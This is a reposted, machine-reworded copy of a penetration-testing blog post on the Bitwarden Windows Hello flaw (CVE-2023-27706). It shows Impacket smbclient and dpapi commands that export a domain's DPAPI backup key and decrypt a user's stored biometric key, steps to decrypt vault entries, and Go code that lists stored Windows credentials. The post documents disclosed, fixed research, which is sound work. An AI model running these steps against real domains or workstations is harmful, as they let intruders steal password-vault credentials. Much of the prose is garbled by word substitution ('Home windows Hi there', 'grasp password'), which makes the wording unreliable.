Now Reading
RedTeam Pentesting – Weblog – Bitwarden Heist

RedTeam Pentesting – Weblog – Bitwarden Heist

2024-01-03 05:53:12

3 January 2024

Bitwarden Heist – The way to Break Into Password Vaults With out Utilizing Passwords

Generally, making specific safety design choices can have sudden
penalties. For security-critical software program, reminiscent of password managers, this
can simply result in catastrophic failure: On this weblog publish, we present how
Bitwarden’s Home windows Hi there implementation allowed us
to remotely steal all credentials from the vault with out understanding the password
or requiring biometric authentication. Once we found this throughout a
penetration take a look at it was so sudden for us that we agreed with our shopper to
publish a weblog publish about it and inform the story.

The underlying concern has been corrected in Bitwarden v2023.4.0 in April 2023
(however the story is fascinating nonetheless).

Windows Logo on blue shield in front of an open vault

The place We Began

We not too long ago carried out a penetration take a look at with the objective of compromising the
inner community of a shopper in a Home windows surroundings. As standard, we managed to
get administrative entry to the area controller, nonetheless, there was an
extra hurdle: The backup server, one of many prioritized targets, didn’t
reside throughout the area. Having already gained entry to Area Administrator
accounts, we determined to have a look round their Home windows workstations within the
hopes of uncovering data that may grant us entry to the backup
system. Trying on the workstations, we discovered that passwords appeared to be
saved utilizing Bitwarden (the next particulars apply to Model Desktop
v2023.3.0

of the software program). We made the belief that credentials to the backup system
is perhaps discovered within the Bitwarden vault of the workers answerable for the IT
infrastructure. After consulting with our shopper, we bought the permission to
try to retrieve the contents of one in all these vaults. Since we didn’t need
to doubtlessly disrupt the shopper’s enterprise through the use of invasive methods such
as key loggers to acquire entry to the backup system, we appeared for an
unintrusive approach with out counting on finish consumer interplay if doable.

We first tried to crack the vault utilizing easy credential stuffing assaults,
nonetheless this remained unsuccessful, main us to finally try a extra
inventive strategy. To additional analyze the vault, we determined to obtain
the principle storage file of Bitwarden, within the hopes of discovering something of observe. It
is positioned below the consumer’s dwelling listing at
%AppDatapercentBitwardendata.json. Downloading the JSON file and opening it
in a textual content editor already revealed an sudden discovering:

		"openAtLogin": false,
		"enableBiometrics": true,
		"biometricText": "unlockWithWindowsHello",
		"noAutoPromptBiometricsText": "autoPromptWindowsHello",
		"installedVersion": "2023.3.0",
        [...]
			"avatarColor": null,
			"biometricUnlock": true
		},
		"tokens": {

It appeared that this Bitwarden vault might be opened utilizing Biometrics, and
Home windows Hi there specifically. We had the sensation that it is perhaps price wanting
at, so we determined to dig deeper.

Biometric Unlock – How Does it Work?

Even when biometrics are enabled, the vault nonetheless has a principal password (Bitwarden
calls it master password), you
merely should not have to all the time enter it to unlock the vault. This begs the
query how the vault is secured should you should not have to enter the grasp
password. Nicely, the vault just isn’t actually encrypted with the grasp password, however
with an account encryption key, which is itself saved in encrypted type
throughout the vault. The important thing to decrypting the account encryption key is derived
from the principal password chosen throughout vault creation.

In different phrases: When a consumer enters their principal password, Bitwarden derives a key
from the password and this secret’s then used to decrypt the precise account
encryption key
which in flip can decrypt the credentials saved within the vault.

The important thing derived from the principal password can be referred to as derived key from now
on and it’s precisely the place the biometric unlock comes into play. At this level,
customers can select so as to add extra unlock mechanisms, which often leads to an
encrypted copy of the derived key being saved at a (hopefully) protected location
from which it may be retrieved utilizing biometrics, for instance. Consequently,
whoever can retrieve and decrypt the derived key doesn’t want a password to
entry the vault.

The already described Biometric unlock is applied based mostly on Home windows Hi there on
Home windows machines. Consequently, activating biometric login on Home windows implies that
the derived key is encrypted domestically utilizing a secret which could be retrieved
after authentication by way of Home windows Hi there. To date so good, however because it seems, it
could be very a lot worthwhile to take a better look into how that is really
applied in Bitwarden.

After some digging, we discovered that Bitwarden saved the encrypted copy of the
derived key utilizing the Home windows Credentials API by calling
windows::win32::Credentials::CredWriteW
within the bitwarden/clients Rust
code
.
Sadly, the documentation on how these credentials are protected is
meager, to say the least, which makes it sophisticated to really perceive what
is occurring when the API is used. It appears, as if CredWriteW creates
credentials utilizing the Credential Manager,
which in flip appears to invoke the lower-level Information Safety API
(DPAPI).
DPAPI supplies a handy solution to store data
securely

such that solely the given consumer is ready to retrieve the info at a later level in
time. The variations between defending credentials by way of the Credential Supervisor
and DPAPI are considerably unclear, nonetheless utilizing the Credential Supervisor appears to
present additional benefits over utilizing
the low-level API, for instance UI visibility (you may take a look at this your self by
trying to find the Credential Supervisor utility in you Home windows Begin menu).

So with a purpose to decrypt the Bitwarden vault, we both must know the principle
password with a purpose to derive the derived key on-the-fly or we have to retrieve
the derived key from the depths of the encrypted DPAPI storage. We knew that
DPAPI has lots of ties to the Lively Listing which are related for
domain-joined workstations and we had already compromised the shopper’s Lively
Listing, so we selected the latter strategy.

Robbing the Vault Remotely – Who Wants a Grasp Password, Anyway?

We quickly discovered about an awfully convenient
feature

of DPAPI, or moderately its newer model
DPAPI-NG on
domain-joined workstations:

Usually, area customers encrypt DPAPI-protected knowledge utilizing keys which are
derived from their very own passwords. Nonetheless, if the consumer forgets their password,
or if their password is administratively reset or reset from one other gadget,
the beforehand encrypted knowledge can now not be decrypted utilizing the brand new keys
derived from the consumer’s new password. When this happens, the info can nonetheless be
decrypted utilizing the Backup keys saved on the Lively Listing area
controllers. They will then be re-encrypted with the consumer’s new
password-derived key. Which means that anybody who has the DPAPI Backup keys for
a website will be capable to decrypt DPAPI-encrypted knowledge for any area consumer,
even after the consumer’s password is modified.

This implies for one which the info is encrypted utilizing the password of the area
consumer and no direct involvement of Home windows Hi there is required to decrypt it (as lengthy
because the consumer’s password is understood). Moreover, the info can moreover be
decrypted with a remote backup
key

saved on the area controller. What may probably go mistaken?

For the reason that workstation operating Bitwarden was domain-joined and the area was
already compromised, we started looking for DPAPI keys with a purpose to exploit this
mechanism. First, we have to acquire no matter DPAPI shops on the machine itself.

We shortly discovered that two directories have been of specific relevance to us:
%AppDatapercentMicrosoftProtect, which is used to securely retailer the DPAPI
decryption keys
, and %AppDatapercentMicrosoftCredentials, the place the protected
knowledge
resides. Be aware, that we use some simplifications involving the creation of
session keys in DPAPI since they’re of no relevance to this weblog publish; particulars
can be found here.

In case you open these directories within the Explorer, you gained’t see something as a result of
they’re hidden in a approach that Explorer gained’t even present them when “Present hidden
information” is enabled. Nonetheless, the PowerShell command Get-ChildItem or gci can
show them when including --force or --hidden. They’re additionally seen by way of SMB
and as we already had distant administrator entry we selected this path.

The next code snippets are taken from our lab surroundings, however are intently
based mostly on the precise penetration take a look at. First, we obtained the required Bitwarden
knowledge file utilizing smbclient from the Impacket
project
:

$ smbclient.py 'LAB/Administrator:<password>@workstation.lab'
Impacket v0.10.0.post1+20230417.105142.28de12f1 - Copyright 2022 Fortra

Sort assist for checklist of instructions
# use C$
# get Usersuser1AppDataRoamingBitwardendata.json

In the identical session, we additionally downloaded the Credentials and Protected knowledge:

# cd Usersuser1AppDataRoamingMicrosoftCredentials
# ls
drw-rw-rw-          0  Tue Nov 28 12:59:46 2023 .
drw-rw-rw-          0  Tue Nov 28 12:59:46 2023 ..
-rw-rw-rw-        686  Tue Nov 28 14:02:38 2023 C6530B1481D73604A6A51D114372F1AA
# get C6530B1481D73604A6A51D114372F1AA
# cd ..
# cd Defend
# ls
drw-rw-rw-          0  Mon Nov 27 09:59:01 2023 .
drw-rw-rw-          0  Mon Nov 27 09:59:01 2023 ..
-rw-rw-rw-         24  Mon Nov 27 09:58:51 2023 CREDHIST
drw-rw-rw-          0  Mon Nov 27 09:58:51 2023 S-1-5-21-505269936-2602674991-4082112561-1105
-rw-rw-rw-         76  Mon Nov 27 09:59:01 2023 SYNCHIST
# cd S-1-5-21-505269936-2602674991-4082112561-1105
# ls
drw-rw-rw-          0  Mon Nov 27 09:58:51 2023 .
drw-rw-rw-          0  Mon Nov 27 09:58:51 2023 ..
-rw-rw-rw-        740  Mon Nov 27 09:58:51 2023 14c8d0db-8c7c-4bf8-a857-eb20500a3893
-rw-rw-rw-        904  Mon Nov 27 09:58:51 2023 BK-LAB
-rw-rw-rw-         24  Mon Nov 27 09:58:51 2023 Most popular
# get 14c8d0db-8c7c-4bf8-a857-eb20500a3893
# exit

Downloading these information made it doable to work on the decryption course of
domestically, nonetheless it additionally meant that we didn’t acquire entry to the consumer’s principal
decryption password immediately. That is the place the helpful characteristic to decrypt DPAPI
decryption keys utilizing backup keys comes into play, as we all know that it’s
doable to decrypt these native secrets and techniques with the backup key from the area
controller. We may conveniently obtain it utilizing the dpapi.py script from
the Impacket project:

$ dpapi.py backupkeys -t 'LAB/Administrator:<password>@dc.lab' --export

On this case, we renamed the important thing to backupkey.pvk. Utilizing this newly acquired
key, we may begin by decrypting the protected DPAPI decryption key that we
took from the workstation:

$ dpapi.py masterkey -pvk backupkey.pvk -file ./14c8d0db-8c7c-4bf8-a857-eb20500a3893
Impacket v0.10.0.post1+20230417.105142.28de12f1 - Copyright 2022 Fortra

[MASTERKEYFILE]
Model     :        2 (2)
Guid        : 14c8d0db-8c7c-4bf8-a857-eb20500a3893
Flags       :        0 (0)
Coverage      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with area backup key offered
Decrypted key: 0xad69553beafe0c5bcaf3b61a61136da64c50c57406f3649c6f70c11dc8d22a09d87241bd769ddbcb022a64744cbcd28342176593da30c825a0a56105496f0d5a

It was now merely a matter of utilizing this key to decrypt the Biometric login
credentials that are essential to get into the Bitwarden vault:

$ dpapi.py credential -f ./C6530B1481D73604A6A51D114372F1AA -key 0xad69553beafe0c5bcaf3b61a61136da64c50c57406f3649c6f70c11dc8d22a09d87241bd769ddbcb022a64744cbcd28342176593da30c825a0a56105496f0d5a
Impacket v0.10.0.post1+20230417.105142.28de12f1 - Copyright 2022 Fortra

[CREDENTIAL]
LastWritten : 2023-11-28 14:02:38
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Sort        : 0x00000001 (CRED_TYPE_GENERIC)
Goal      : LegacyGeneric:goal=Bitwarden_biometric/ea0b6061-4381-4534-9e91-50cf98753530_masterkey_biometric
Description :
Unknown     :
Username    : ea0b6061-4381-4534-9e91-50cf98753530_masterkey_biometric
Unknown     : "6PN6Y9wkXjrHvDCijM7fhkNrDL8PI/dc70m9XoSqxDE="

This revealed the biometric key (a duplicate of the beforehand described derived
key
), which grants entry to the Bitwarden vault:
6PN6Y9wkXjrHvDCijM7fhkNrDL8PI/dc70m9XoSqxDE=

Which means that we don’t want the principle password, we don’t want the fingerprint
for biometrics, we don’t even have to make use of a keylogger or dump Bitwarden’s
course of reminiscence. This additionally implies that we don’t should wrestle with endpoint
safety and we don’t want to attend for the precise consumer to unlock the vault. We
merely have to make use of DPAPI because it was designed. We critically doubt any consumer is
conscious of those implications when enabling Home windows Hi there for his or her vault.

To date we solely have proven the derived/biometric key, which is ample to
decrypt the vault. In follow, nonetheless, there may be nonetheless a bit legwork we
should do. In spite of everything, our objective was to not reveal that we may decrypt
the vault however to get precise credentials from the vault.

Breaking Into the Vault

We first had to determine find out how to decrypt the Bitwarden account encryption
key
, which protects all different data within the vault. Credentials will not be
all the time encrypted with the account encryption key immediately since Bitwarden
additionally helps utilization situations the place some credentials needs to be shared in an
group, for instance. That is solved by including extra layers of keys
(personal and organizational keys), that are used to encrypt group
credentials, and are additionally protected utilizing the account encryption key. Take a
take a look at the determine under in case you are beginning to get confused about all of the keys
concerned on this story.

Overview of keys

The decryption course of subsequently consists of three principal steps: (1) Decryption
of the account encryption key utilizing the biometric key, (2) decryption of the
second layer of keys utilizing the account encryption key and (3) decryption of the
credentials utilizing both the account encryption key or one of many intermediate
keys. We then got down to write a Python script to automate the decryption. Let’s
stroll by every step:

  1. We began by extracting the consumer object from the Bitwarden knowledge file
    knowledge.json. The consumer object comprises the encrypted credentials (within the
    knowledge part) and the encryption keys (within the keys part), as well as
    to (unencrypted) details about the consumer account like the e-mail handle
    (profile), settings like the net vault URL (settings) and extra. The
    consumer part could be recognized by trying to find a UUID which is used as key
    within the JSON object:

    "ea0b6061-4381-4534-9e91-50cf98753530": {
        "knowledge": {
            [...]
        "keys": {
            "cryptoSymmetricKey": rB5YmxVMKo9tJtNSmRT8mpVQu7GEAHhKndJBXKBwWfW1rw6i3x003ZPligtJCmWXpdHIryF2fb5KdETAvr9QLws27A8z3ZAO4KNAgrzGH14=,
            [...]
    

    Since Bitwarden makes use of various kinds of encryption for various situations,
    all encrypted values are saved utilizing a specific format, which begins with
    an encryption sort identifier (from
    GitHub
    ):

    export enum EncryptionType {
      AesCbc256_B64 = 0,
      AesCbc128_HmacSha256_B64 = 1,
      AesCbc256_HmacSha256_B64 = 2,
      Rsa2048_OaepSha256_B64 = 3,
      Rsa2048_OaepSha1_B64 = 4,
      Rsa2048_OaepSha256_HmacSha256_B64 = 5,
      Rsa2048_OaepSha1_HmacSha256_B64 = 6,
    }
    
    /** [...]
     * Instance of annotated serialized EncStrings:
     * 0.iv|knowledge
     * 1.iv|knowledge|mac
     * 2.iv|knowledge|mac
     * 3.knowledge
     * 4.knowledge
     [...]
    

    As indicated by the main 2, our account encryption key was encrypted
    utilizing AES-CBC-256, and integrity-protected utilizing an HMAC based mostly on SHA-256.
    Earlier than decrypting the account key with the biometric key, it needs to be
    expanded utilizing HKDF-expand, although.

  2. With the account encryption key, we have been in a position to decrypt the second layer of
    keys, which have been all saved within the "keys" a part of the consumer object as properly.

        "privateKey": 7OHkUd5GY5akE7IqLGRfJW4cL6P9KltcJOhLepjGPsyOBt0Jzr5+PPakvp8Fz3pgAYNXszCqDP8aqz/q+JhsZVtx5VP3OE6KINdmBvWEO0EX0PEMxtI08WiDNKadlFgNG9zyotIsA+6MA0cDwMIdKYPUWv7P3JB2Y0W9jlqeQQkPerg3voEvGLHOUa48xv7hJt3Q8fIPH3yoo9i5UN042QNEBmn9GBYdFw0gMNdDvMnK47j8kHQ+18SBMpIG0tjLylEmN0aA1QOXq9XHaorguOowUaLQU5funOiurFPpXv7CuXdlJiYak8nBQjdEj9euAEKe4himejHak0CUwMsNqqF7HdAhpLdGLY/gtskd/2e9v8Gwq93nBGNfRBTtfO8tWRWf+ygFqninfR9QquIHQ7BPJMHXsupoOUFlwNV7RVrG1Qa64sv0k1ksP38GyY8jzU2YZVsLWPjwHdHwXIeZzwC2CQ7JO6x9i/zkT9GJIEMBRAf6WBcIy0Q8J1LZvzlIEAJDqZaungjfwKDovaJVCHAq4WTaM0SyNj01RNARsLbVCweGlx1eQ6jootNdovOTR4jprmWwyfe9FQf9Xabm40Bwx8E2jZY2TxyS+Y0TzhdO3Rg0gETb8GHIlXeTU28fPVusjopv0eZXwe97NQhvyhDXCrZM7/546rCIvWTdcmouKdQEaXUXe02nuJl8UGjqqLuuKNxFfNez+RY7khCf7xU5wXzoC/90pNP1nM0FkB9IPe/J7EUvhBHrD+dP+6SxJ9mPDByN/u68kvBeu8R3dn234zJiqDNFWtmliGJMrYybzmViHI70tDxInv/9KoJfJK6QD+SypcEJjytZm+U8kEaWHkaxyMMUQIaHdmmhDYixjC6iclZWvAk5nMhf0wQm5NJJdfIQTWoID4kOMoS71OXExVkLVm93O5AflyD5jcWu/z6IThDY7nEg35t2ziRM1djkhnkK0Eunp45u/bpfhwYsMCnM8IJEiZ9kOOkFfCWCOZJwsk2uINmTBp8PKJD06sluhFKdOFtEDP7PMhEKVt2D2a1yMPT4PCdLYiSe18PQloUgBWC8ica4BVcGnTjGKkloqLNHF8T4nd1igW+LL+FbAj4DVJVciTV6hdHhdf0xmIoz+OhvIfzrmYxy5hjJjmesSvZq8FuK6G746cFCIQmGjT7lZuQcaR2msWawsIEcjFFFy6vIRiwQo72yeyCAmDEbgETLjSfs3jrhXf8pvcEWuci8bpsOV1zr+Od60OU+/30cFal2guazAlIT2jF+zvpf+qWC/A7lVu0iroTAoXu8/IOLxLpaF+xSso7kbrNbsKyx2fJuhNdTLOrqvnv4rw+73n11/fhF3506eN3ULj57kGFIKnRIkueMMwS7DIMla8BPT1rrUNZarTyDupF63KSjJbG9nPXneBeWjHi43jsW78PMtndfqrAr9pn02Me9vYGl8nhseEGArR3iN2fTkrWbV3wwjTbMnGfk4Z43fhsAKaGet6gjmLmcGhbeC2wSEAFgTnoMLZM/CUcqFBopyvMNVkAUs495qZCNvqgpT5f7DrJuzq+GbHK8fypdF+qxwUeUyDzFQfTvf1gKc+ISDYN0mXqDNH1II5aMu/4j0U4gvlO9vxKfJxms2tq0WGY=
    

    As could be inferred from the encryption sort, this key was additionally encrypted
    utilizing AES-CBC. In our take a look at setup, the personal RSA key might be used to
    decrypt extra organizational keys, which have been in flip required to
    entry organization-specific credentials.

    See Also

  3. Having obtained all intermediate keys, we have been lastly in a position to extract the
    desired credentials:

    "46d9d1c2-7595-4c18-989d-053e1bf5336f": {
        "id": "46d9d1c2-7595-4c18-989d-053e1bf5336f",
        "organizationId": null,
        [...]
        "login": {
            "username": "2.Ok+/iMJyO27Wzqos4JtTfmA==|FB1cyKstIHGPBx4GBRk651FZ1zr3NpLBEoe1Vf3FFe4=|Y/2Kur7jIvI/ecXA64ARKs6qy7zLXJh9NVC81+uyeiI=",
            "password": "2.ALOh5YroSqPCkoyzviK0/g==|FDzMel84he7OPGGLatBgxw==|fVxA3OIeNkLwH3zzDU66F40ykDD0PGUOBSEcpMlp3w8=",
            [...]
    

    Such a credential might be decrypted utilizing the account key immediately
    (recognizable by the empty organizationId).

    Different credentials required intermediate keys (organizationId is about):

    "fad536b0-0b44-4cf2-8741-bca6ce7881d0": {
        "id": "fad536b0-0b44-4cf2-8741-bca6ce7881d0",
        "organizationId": "1d05eff7-8a52-44b1-a004-9835dc485985",
        [...]
        "login": {
            "username": null,
            "password": "2.qiVz94La8KSO+GaLbUHjGw==|Khqd0v88X8SqC2gTTrQMtQ==|PYFaG7+X9rL8LZUzbo1T3xIATDAOlybnN3tviBST3/c=",
            [...]
    

Now we are able to see our vault decryption script in motion:

Terminal output of running python script to decrypt credentials.

As we had hoped, the Bitwarden vault on the Administrator’s workstation did
certainly embody the credentials to entry the particular backup system, lastly
granting us entry to the sought-after backups. You may in all probability think about the
astonishment of our shopper after we instructed them concerning the assault, as they’d no
concept that area admins can bypass Bitwarden’s vault protections.

Nicely, we’ve all the time identified attackers with area admin privileges are fairly
highly effective within the first place, however at the least the vault is protected towards
unprivileged attackers on the native workstation, proper? …proper?

However Wait, There’s Extra: Who Wants Biometrics, Anyway?

Within the technique of attempting to know this complete mechanism, we began enjoying
round with DPAPI in our lab setup. For instance, we thought that utilizing the API
itself might be simpler than cobbling collectively the important thing information from %AppData%.
To familiarize ourselves with DPAPI, we wrote a tiny Go program to see what
credentials are saved in DPAPI on the workstation utilizing the
wincred library. The total script is on the market
here, however the one fascinating strains are these:

creds, err := wincred.Record()
if err != nil {
    return fmt.Errorf("wincred checklist: %w", err)
}

for _, cred := vary creds {
    credentialBlob, err := decodeUTF16LE(cred.CredentialBlob)
    if err != nil {
        credentialBlob = fmt.Sprintf("%q", string(cred.CredentialBlob))
    }

	fmt.Printf("%s:n    * %sn", cred.UserName, credentialBlob)
}

It solely calls windcred.Record() which is a skinny Go wrapper round
CredEnumerateW
which merely “enumerates the credentials from the consumer’s credential set”.
Nonetheless, we didn’t count on that this perform instantly spits out Bitwarden’s
derived/biometrics key with out prompting for biometric authentication utilizing
Home windows Hi there:

Terminal output of Go program that lists DPAPI credentials.

Which means that any course of that runs because the low-privileged consumer session can
merely ask DPAPI for the credentials to unlock the vault, no questions requested and
no PIN or fingerprint immediate required and Home windows Hi there just isn’t even concerned at
all. The one caveat is that this doesn’t work for different consumer accounts.

Bitwarden itself does immediate for biometric authentication when unlocking the
vault, nevertheless it wouldn’t even should. Actually, you possibly can in all probability take away a number of
strains from the supply code and have it unlock with no immediate. The entire concern is
probably a results of misunderstanding the main points of the CredWriteW perform, or
possibly an unawareness of the potential pitfalls of utilizing DPAPI to retailer
encryption keys.

A Characteristic, Not a Bug

We contacted each Bitwarden and Microsoft concerning the particulars of this assault. We
all the time be sure that to comply with trade greatest practices for accountable disclosure,
even whether it is unclear whether or not our findings are precise vulnerabilities. For the
assault defined on this weblog publish, this was the case as it’s not clear whether or not
the assault is in scope of both Bitwarden (for the reason that assault already assumes
entry to the workstation of the sufferer and the Home windows area) or Microsoft
(who’re solely concerned by offering DPAPI to retailer the decryption keys).
Microsoft certainly responded to our report by stating that DPAPI and its backup
mechanism have been used precisely as supposed, and that our assault subsequently didn’t
point out any vulnerabilities on their facet.

Bitwarden additionally responded, nonetheless they agreed that this habits was unintended,
and said that they have been already monitoring the same concern internally. Because it
seems, we weren’t the primary to find this in March 2023, it had already
been reported to Bitwarden through
HackerOne
. Nonetheless, we didn’t know this
because it was solely disclosed in June 2023. Since then the vulnerability is understood
as CVE-2023-27706.

Bitwarden has since made modifications to their codebase to mitigate this specific
situation, which we’ll shortly summarize within the subsequent part. They’ve additionally
modified the default setting when utilizing Home windows Hi there as login characteristic to require
coming into the principle password at the least as soon as when Bitwarden is began.

Biometrics in Bitwarden Now

To arrange for this weblog publish, we additionally took a take a look at how credentials are saved
within the present model of Bitwarden Desktop
v2023.10.1
.
Bitwarden nonetheless makes use of Home windows Hi there and DPAPI, that are nonetheless accessible
utilizing the area backup key. Nonetheless the content material of the secured knowledge blobs has
modified:

$ dpapi.py credential -f DAF81666731C8E899E9464647512792B -key 0xad69553beafe0c5bcaf3b61a61136da64c50c57406f3649c6f70c11dc8d22a09d87241bd769ddbcb022a64744cbcd28342176593da30c825a0a56105496f0d5a
Impacket v0.10.0.post1+20230417.105142.28de12f1 - Copyright 2022 Fortra

[CREDENTIAL]
LastWritten : 2023-11-28 15:01:47
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Sort        : 0x00000001 (CRED_TYPE_GENERIC)
Goal      : LegacyGeneric:goal=Bitwarden_biometric/ea0b6061-4381-4534-9e91-50cf98753530_user_biometric
Description :
Unknown     :
Username    : ea0b6061-4381-4534-9e91-50cf98753530_user_biometric
Unknown     : 0.OQeotvzeRCpHoEb2c7TZ2g==|3PqjMDiq1J9hHnO7KESu0fG6Vl4yl2siOImoZghma2FpfNJmfKyGAmJNq00ay3/HV1dd855YMlNc7k3wSam47nxWEAuQU/oCaiPH9q5k9I+OJuvv01HVniqq7ERzRWLp

$ dpapi.py credential -f 1A52DC5CA68038A3E4216121AA1A7E0E -key 0xad69553beafe0c5bcaf3b61a61136da64c50c57406f3649c6f70c11dc8d22a09d87241bd769ddbcb022a64744cbcd28342176593da30c825a0a56105496f0d5a
Impacket v0.10.0.post1+20230417.105142.28de12f1 - Copyright 2022 Fortra

[CREDENTIAL]
LastWritten : 2023-11-28 15:01:47
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Sort        : 0x00000001 (CRED_TYPE_GENERIC)
Goal      : LegacyGeneric:goal=Bitwarden_biometric/ea0b6061-4381-4534-9e91-50cf98753530_user_biometric_witness
Description :
Unknown     :
Username    : ea0b6061-4381-4534-9e91-50cf98753530_user_biometric_witness
Unknown     : 0.OQeotvzeRCpHoEb2c7TZ2g==|Kbo2ptPoXcw3N30AnYA8fw==

As an alternative of storing the precious derived/biometric key by way of DPAPI, Bitwarden now
shops two secured knowledge blobs, that are encrypted and might now not be used to
decrypt the account encryption key immediately (indicated by the encryption sort
0). The saved knowledge blobs are actually moreover encrypted utilizing the
KeyCredentialManager
API

which really requires interplay with Home windows Hi there to provide a decryption
key. Whereas it appears to us that this fixes the problem, we’ve got not really examined
the brand new implementation for different vulnerabilities, but.




Source Link

What's Your Reaction?
Excited
0
Happy
0
In Love
0
Not Sure
0
Silly
0
View Comments (0)

Leave a Reply

Your email address will not be published.

2022 Blinking Robots.
WordPress by Doejo

Scroll To Top